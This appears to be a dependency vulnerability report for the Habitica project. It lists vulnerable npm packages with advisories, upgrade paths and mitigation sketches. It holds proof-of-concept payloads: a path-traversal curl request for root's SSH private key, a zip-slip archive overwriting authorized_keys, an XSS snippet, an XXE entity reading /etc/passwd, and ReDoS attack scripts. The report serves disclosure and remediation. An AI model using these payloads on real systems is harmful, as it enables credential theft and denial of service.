curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.3 or higher.
References
medium severity
- Vulnerable module: bootstrap
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › bootstrap@3.4.1
Overview
bootstrap is a popular front-end framework for faster and easier web development.
Affected versions of this package are vulnerable to Cross-site Scripting through the data-loading-text attribute in the button component. An attacker can execute arbitrary JavaScript code by injecting malicious scripts into this attribute.
Note:
This vulnerability is under active investigation and it may be updated with further details.
PoC
<input
id="firstName"
type="text"
value="<script>alert('XSS Input Success')</script><span>Loading XSS</span>"
/>
<button
class="btn btn-primary input-test"
data-loading-text="<span>I'm Loading</span>"
type="button"
>
Click Me
</button>
<script>
$(function () {
$('.input-test').click(function () {
var inputValue = $('#firstName').val();
$(this).data('loadingText', inputValue);
$(this).button('loading', inputValue);
});
});
</script>
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | Client | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
- Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
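The escaping practice described above can be sketched as a minimal helper. This is illustrative; in production, prefer a maintained escaping library or a framework's automatic output encoding.

```javascript
// Minimal HTML-escaping helper (illustrative). Ampersand must be
// replaced first, or already-escaped entities would be double-escaped.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const payload = `<script>alert('XSS Input Success')</script>`;
console.log(escapeHtml(payload));
// &lt;script&gt;alert(&#39;XSS Input Success&#39;)&lt;/script&gt;
```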
Remediation
Upgrade bootstrap to version 4.0.0 or higher.
References
medium severity
- Vulnerable module: got
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › download@6.2.5 › got@7.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › download@6.2.5 › got@7.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › download@6.2.5 › got@7.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2
Overview
Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs, allowing a victim to be redirected to a UNIX socket.
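The kind of verification the fixed versions add can be sketched with the WHATWG URL parser: parse the redirect target and reject anything that is not plain http/https to an expected host. The function name and host allowlist here are illustrative, not got's API.

```javascript
// Sketch of redirect-target validation (illustrative, not got's code):
// parse the Location value and allow only http/https to known hosts.
function isSafeRedirect(location, allowedHosts) {
  let url;
  try {
    url = new URL(location);
  } catch {
    return false; // unparseable target
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return false; // blocks unix:, file:, data:, etc.
  }
  return allowedHosts.includes(url.hostname);
}

console.log(isSafeRedirect('https://example.com/next', ['example.com'])); // true
console.log(isSafeRedirect('unix:/var/run/docker.sock', ['example.com'])); // false
```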
Remediation
Upgrade got to version 11.8.5, 12.1.0 or higher.
References
medium severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is a pure JavaScript, W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to XML External Entity (XXE) Injection. The parser does not correctly preserve system identifiers, FPIs, or namespaces when repeatedly parsing and serializing maliciously crafted documents.
Details
XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.
Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.
For example, below is a sample XML document, containing an XML element- username.
<?xml version="1.0" encoding="ISO-8859-1"?>
<username>John</username>
An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<username>&xxe;</username>
Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.
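When the parser itself offers no option to refuse external entities, a defensive pre-parse check is one workaround: reject any document that declares a DOCTYPE before handing it to the parser. This sketch is an assumption about a reasonable mitigation, not a feature of xmldom, and it is only appropriate when your application never needs legitimate DOCTYPEs.

```javascript
// Defensive pre-parse check (illustrative): refuse documents that declare
// a DOCTYPE, since that is where external entities are defined.
function assertNoDoctype(xml) {
  if (/<!DOCTYPE/i.test(xml)) {
    throw new Error('DOCTYPE declarations are not allowed');
  }
  return xml;
}

const benign = '<?xml version="1.0"?><username>John</username>';
const hostile =
  '<?xml version="1.0"?>' +
  '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>' +
  '<username>&xxe;</username>';

console.log(assertNoDoctype(benign) === benign); // true
try {
  assertNoDoctype(hostile);
} catch (e) {
  console.log(e.message); // DOCTYPE declarations are not allowed
}
```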
Remediation
Upgrade xmldom to version 0.5.0 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4
Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker can deplete system resources by providing a manipulated string as input to the format method, causing the regular expression to exhibit a time complexity of O(n^2). The server becomes unable to provide normal service due to the excessive time spent processing the vulnerable regular expression.
PoC
const axios = require('axios');
console.time('t1');
axios.defaults.baseURL = '/'.repeat(10000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t1');
console.time('t2');
axios.defaults.baseURL = '/'.repeat(100000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t2');
/* stdout
t1: 60.826ms
t2: 5.826s
*/
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A: The string must start with the letter 'A'
- (B|C+)+: The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D: Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
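One practical mitigation for a backtracking-prone pattern is to bound the input length before the regex ever runs, so worst-case work stays bounded. This sketch is an illustration of that idea, using the vulnerable pattern discussed above; the length cap is an assumption to tune per field.

```javascript
// Mitigation sketch (illustrative): cap input length before feeding a
// backtracking-prone regex, so catastrophic backtracking cannot grow.
const MAX_LEN = 256; // assumption: tune to the field being validated

function safeTest(re, input) {
  if (input.length > MAX_LEN) {
    return false; // refuse oversized input instead of risking a CPU spin
  }
  return re.test(input);
}

const risky = /A(B|C+)+D/; // the vulnerable pattern from the example above
console.log(safeTest(risky, 'ABCCCCD'));                    // true
console.log(safeTest(risky, 'A' + 'C'.repeat(10000) + 'X')); // false, rejected by length
```

Length capping limits damage but does not remove the flaw; rewriting the pattern to avoid nested quantifiers (or upgrading the affected package) is the real fix.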
Remediation
Upgrade axios to version 0.29.0, 1.6.3 or higher.
References
medium severity
- Vulnerable module: browserslist
- Introduced through: babel-preset-env@1.7.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › browserslist@3.2.8
Overview
browserslist shares target browsers between different front-end tools, like Autoprefixer, Stylelint and babel-preset-env.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.
PoC by Yeting Li
var browserslist = require("browserslist")
function build_attack(n) {
var ret = "> "
for (var i = 0; i < n; i++) {
ret += "1"
}
return ret + "!";
}
// browserslist('> 1%')
//browserslist(build_attack(500000))
for(var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
try{
browserslist(attack_str);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
catch(e){
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A: The string must start with the letter 'A'
- (B|C+)+: The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D: Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade browserslist to version 4.16.5 or higher.
References
medium severity
- Vulnerable module: glob-parent
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › glob-parent@3.1.0
Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › vinyl-fs@3.0.3 › glob-stream@6.1.0 › glob-parent@3.1.0
Remediation: Upgrade to gulp@5.0.0.
Overview
glob-parent is a package that helps extracting the non-magic parent path from a glob string.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the enclosure regex used to check for strings ending in an enclosure that contains a path separator.
PoC by Yeting Li
var globParent = require("glob-parent")
function build_attack(n) {
var ret = "{"
for (var i = 0; i < n; i++) {
ret += "/"
}
return ret;
}
globParent(build_attack(5000));
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A: The string must start with the letter 'A'
- (B|C+)+: The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D: Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30-character-long string takes about 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, more than thirty times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, the RegEx101 debugger shows that the engine takes a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme cases cause the regex engine to work very slowly (exponentially relative to input size, as shown above), allowing an attacker to excessively consume CPU and cause a Denial of Service.
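The fix for patterns like this is usually to give the engine only one way to consume each character. Here, (B|C+)+ matches any non-empty run of B's and C's, so the character class [BC]+ accepts exactly the same strings without the nested quantifier; a sketch:

```javascript
const vulnerable = /A(B|C+)+D/; // nested quantifier: catastrophic backtracking
const linear = /A[BC]+D/;       // equivalent here, no backtracking blow-up

// Both accept the same matching inputs:
console.log(vulnerable.test("ABCCCCD"), linear.test("ABCCCCD")); // true true

// Only the rewritten pattern is safe to run on a long almost-match:
console.log(linear.test("A" + "C".repeat(5000) + "X")); // false, instant
```

Note the long non-matching input is only ever fed to the linear pattern; running the vulnerable one on it would hang the process.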
Remediation
Upgrade glob-parent to version 5.1.2 or higher.
References
medium severity
- Vulnerable module: http-cache-semantics
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2 › cacheable-request@2.1.4 › http-cache-semantics@3.8.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2 › cacheable-request@2.1.4 › http-cache-semantics@3.8.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2 › cacheable-request@2.1.4 › http-cache-semantics@3.8.1
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.
PoC
Run the following script in Node.js after installing the http-cache-semantics NPM package:
const CachePolicy = require("http-cache-semantics");

for (let i = 0; i <= 5; i++) {
  const attack = "a" + " ".repeat(i * 7000) + "z";
  const start = performance.now();
  new CachePolicy(
    { headers: {} },
    { headers: { "cache-control": attack } }
  );
  console.log(`${attack.length}: ${performance.now() - start}ms`);
}
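Since the attack only becomes expensive with very long header values, one stopgap if upgrading is blocked is to bound header length before it reaches the cache-policy parser. A hedged sketch (the limit and function name are illustrative, not part of any library):

```javascript
// Assumption: 1024 bytes is far above any legitimate cache-control
// value; tune for your traffic.
const MAX_HEADER_VALUE = 1024;

function dropOversizedCacheControl(headers) {
  const value = headers["cache-control"];
  if (typeof value === "string" && value.length > MAX_HEADER_VALUE) {
    // Drop the suspicious header rather than parse it.
    const copy = { ...headers };
    delete copy["cache-control"];
    return copy;
  }
  return headers;
}
```

Request headers would be run through this guard before constructing a CachePolicy.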
Details
See the ReDoS details section earlier in this report.
Remediation
Upgrade http-cache-semantics to version 4.1.1 or higher.
References
medium severity
- Vulnerable module: micromatch
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10
Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10
Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10
Overview
Affected versions of this package are vulnerable to Inefficient Regular Expression Complexity due to the use of unsafe pattern configurations that allow greedy matching through the micromatch.braces() function. An attacker can cause the application to hang or slow down by passing a malicious payload that triggers extensive backtracking in regular expression processing.
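Because the payload must reach micromatch.braces() to trigger the backtracking, a cheap guard in front of the matcher bounds the attacker-controlled input. A sketch (the length limit and function name are assumptions, not part of micromatch):

```javascript
// Assumption: 256 characters comfortably covers legitimate glob
// patterns in most build setups.
const MAX_PATTERN_LENGTH = 256;

function assertSafePattern(pattern) {
  if (typeof pattern !== "string" || pattern.length > MAX_PATTERN_LENGTH) {
    throw new Error("glob pattern rejected: too long or not a string");
  }
  return pattern;
}
```

Untrusted patterns would pass through this check before being handed to any glob-expansion API.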
Remediation
Upgrade micromatch to version 4.0.8 or higher.
References
medium severity
- Vulnerable module: ramda
- Introduced through: eslint-plugin-mocha@5.3.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-plugin-mocha@5.3.0 › ramda@0.26.1
Remediation: Upgrade to eslint-plugin-mocha@6.3.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in source/trim.js within variable ws.
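If upgrading is blocked, plain whitespace trimming does not need ramda at all; the built-in String.prototype.trim() runs in linear time. A sketch (assumption: standard whitespace semantics suffice for your use, rather than ramda's full `ws` character set):

```javascript
// Native trim, linear-time, as a stand-in for R.trim on untrusted input.
const input = "  hello  ";
console.log(input.trim()); // "hello"
```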
Details
See the ReDoS details section earlier in this report.
Remediation
Upgrade ramda to version 0.27.2 or higher.
References
medium severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a regular expression for matching semver versions.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper usage of regex in the semverRegex() function.
PoC
'0.0.1-' + '-.--'.repeat(i) + ' '
Details
See the ReDoS details section earlier in this report.
Remediation
Upgrade semver-regex to version 3.1.4, 4.0.3 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0
Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the isURL() function, which does not treat : as a protocol delimiter the way browsers do. An attacker can bypass protocol and domain validation by crafting URLs that exploit this discrepancy in protocol parsing, which can lead to Cross-Site Scripting and Open Redirect attacks.
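As defense in depth, the URL can also be parsed the way a browser would and its protocol checked against an explicit allowlist, rather than trusting a regex-based validator alone. A sketch (assumption: Node.js 10+, which ships the WHATWG URL class globally):

```javascript
function isAllowedUrl(input) {
  let url;
  try {
    url = new URL(input); // WHATWG parsing, same delimiter rules as browsers
  } catch {
    return false; // not parseable as an absolute URL
  }
  return ["http:", "https:"].includes(url.protocol);
}

console.log(isAllowedUrl("https://example.com/login")); // true
console.log(isAllowedUrl("javascript:alert(1)"));       // false
```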
Remediation
